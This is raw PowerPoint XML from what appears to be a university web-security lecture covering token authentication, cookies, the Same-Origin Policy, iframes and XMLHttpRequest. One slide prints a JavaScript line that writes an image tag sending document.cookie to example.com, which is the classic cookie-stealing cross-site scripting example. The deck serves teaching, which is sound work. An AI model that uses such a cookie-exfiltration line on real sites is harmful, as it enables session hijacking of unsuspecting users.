          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -74588"/>
              <a:gd name="adj2" fmla="val -1942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 credentials are correct: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Generate a random token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Store token in the database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Send token to the client</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Speech Bubble: Rectangle 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B9497A3-E84E-466E-B4D4-AD4A88ED23D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8261445" y="5019899"/>
            <a:ext cx="3584812" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -68624"/>
              <a:gd name="adj2" fmla="val -3801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Check token in the database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If it exists, user is authenticated </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12861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8" grpId="0" animBg="1"/>
      <p:bldP spid="3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State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origin may set cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Objects from embedded resources may also set cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="312528" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="24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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="24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img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="24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400" dirty="0" err="1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src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="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lang="en-US" sz="24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“http://www.images.com/cats/adorablekitten.jpg"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="24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&gt;&lt;/img&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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312528" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When the browser sends an HTTP request to origin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, which cookies are included?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Only cookies for origin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> that obey the specific path constraints</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="327544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JavaScript?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Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> enables dynamic inclusion of objects</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"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document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="20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.write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lang="en-US" sz="20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'&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1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img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="20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000" dirty="0" err="1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src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="20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=“http://example.com/?c=' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="20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document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="20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.cookie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+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="20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'&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1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img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="20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&gt;'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);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A webpage may include objects and code from multiple domains</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Should </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> from one domain be able to access objects in other domains?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="312528" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="312528" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘https://code.jquery.com/jquery-2.1.3.min.js’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="31252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38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Mixing Origins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4820" y="1690688"/>
            <a:ext cx="5985588" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="241093">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef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&lt;html&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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&lt;head&gt;&lt;/head&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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&lt;body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="241093">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef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	&lt;p&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>This is my page.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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&lt;/p&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="241093">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef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	&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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dirty="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>password =</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>‘s3cr3t’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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	&lt;iframe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>id=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>goog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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dirty="0" err="1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src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="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lang="en-US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‘http://google.com’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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&gt;&lt;/iframe&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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&lt;/body&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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&lt;/html&gt;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70168" y="1690688"/>
            <a:ext cx="5674567" cy="4292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/>
              <a:t>This is my page.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591" y="2340011"/>
            <a:ext cx="5513849" cy="2659947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415212" y="4046388"/>
            <a:ext cx="5475514" cy="761988"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 7462"/>
              <a:gd name="adj2" fmla="val -1444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Can JS from google.com read </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0"/>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>?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320350" y="5341717"/>
            <a:ext cx="5665237" cy="1132816"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 62290"/>
              <a:gd name="adj2" fmla="val -578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Can JS in the main context do the following: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1"/>
              <a:t>document.getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0"/>
              <a:t>(‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1"/>
              <a:t>goog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0"/>
              <a:t>’).cookie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7200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Web has become a powerful platform for developing and distributing applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Huge user population</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Relatively easy to develop and deploy cross-platform</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Platform has evolved significantly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Very simple model initially</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Today, it is a mix of client- and server-side components</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web services and APIs are now ubiquitous</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Geared towards an open model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>On the client-side, all documents, data, and code are visible/modifiable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Commonplace to link to or share data/code with other (untrusted) sites</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8822285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B3B26-C289-47B1-9EF5-73DB69DA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Same Origin Policy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9C008-C63C-48CB-961D-ED841CE792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Same-Origin Policy (SOP) states that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>subjects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> from one origin cannot access </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>objects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> from another origin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SOP is the basis of classic web security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Some exceptions to this policy (unfortunately)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SOP has been relaxed over time to make </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>controlled</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> sharing easier</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In the case of cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Domains are the origins</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cookies are the subjects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81118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0EA11-81F0-4CE0-BAFA-870378025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Same Origin Policy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A4E2D8-021E-4D52-831A-0E71FE948A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Origin = &lt;protocol, hostname, port&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Same-Origin Policy (SOP) states that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>subjects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> from one origin cannot access </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>objects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> from another origin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This applies to JavaScript</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>JS from origin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> cannot access objects from origin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>D’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>E.g. the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> example</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>However, JS included into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> can access all objects in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>D</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>E.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘https://code.jquery.com/jquery-2.1.3.min.js’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;&lt;/script&gt;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501794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70B08E7-FB4C-CA4D-B145-0FBEE0D62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Ex: SOP for http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>www.example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>test.html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F2C967-2F2B-1C46-BC93-374781412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 lvl="0"/>
            <a:fld id="{86CB4B4D-7CA3-9044-876B-883B54F8677D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr lvl="0"/>
              <a:t>32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D976C52-75C8-2A47-AF95-1FD979AAF44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09292" y="1600200"/>
            <a:ext cx="11373415" cy="5105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EB92FA-AF03-4944-BB95-CD9EA6FF4640}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5446241" y="2307311"/>
            <a:ext cx="6336465" cy="4726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4F309C-3C15-4241-8B73-C05C0610F834}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="409292" y="2881131"/>
            <a:ext cx="4480423" cy="4726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A8F1E8-4EB9-4DE6-BC7B-F0A9C0F31A53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5273176" y="2893664"/>
            <a:ext cx="6336465" cy="4726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E5B6D4-B104-4F22-AB8E-226EB29334EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="409292" y="3480017"/>
            <a:ext cx="4480423" cy="4726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D5917D-A704-4FBD-9B06-1B466EF985EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5273176" y="3492550"/>
            <a:ext cx="6336465" cy="4726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4733DA-E231-4019-B61D-755FFB9D3FB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="409292" y="4060940"/>
            <a:ext cx="4480423" cy="4726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AEFFD2-EDD8-402E-967E-0F8738DA3C2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5273176" y="4073473"/>
            <a:ext cx="6336465" cy="4726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6F20F1-C0A7-4FEF-944F-8607D9CB51FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="409292" y="4750042"/>
            <a:ext cx="4480423" cy="4726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F98F06B-E29A-466A-900A-5AD6047F5317}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5273176" y="4762575"/>
            <a:ext cx="6336465" cy="4726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39E3D56-B1F5-4B96-8918-020E1CE67E6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="409292" y="5553464"/>
            <a:ext cx="4480423" cy="4726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47B606D-5D18-4A4C-A8BD-8F44A8833178}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5273176" y="5565997"/>
            <a:ext cx="6336465" cy="4726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8F8211-0CC5-4977-81A5-3279BA83A758}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="409292" y="6170813"/>
            <a:ext cx="4480423" cy="4726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7E64EA7-84EC-47BE-9BA3-750BCABD1E76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5273176" y="6183346"/>
            <a:ext cx="6336465" cy="4726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4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XMLHttpRequest (XHR)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="407" name="Shape 40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1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Introduced by Microsoft in 1999</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2250" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>API for asynchronous network requests</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0"/>
              <a:t> in JavaScript</a:t>
            </a:r>
            <a:endParaRPr sz="2250" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>Browser-specific API (still</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0"/>
              <a:t> to this day</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>Often abstracted via a library</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0"/>
              <a:t> (jQuery)</a:t>
            </a:r>
            <a:endParaRPr sz="2250" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>SOP restrictions apply (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0"/>
              <a:t>with some exceptions</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>Typical workflow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>Handle client-side event</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0"/>
              <a:t> (e.g. button click)</a:t>
            </a:r>
            <a:endParaRPr sz="2250" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>Invoke XHR to server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>Load data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0"/>
              <a:t>from server </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>(HTML, XML, JSON)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>Update </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0"/>
              <a:t>Document Object Model (DOM)</a:t>
            </a:r>
            <a:endParaRPr sz="2250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="408" name="Shape 40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33</a:t>
            </a:fld>
            <a:endParaRPr sz="984"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
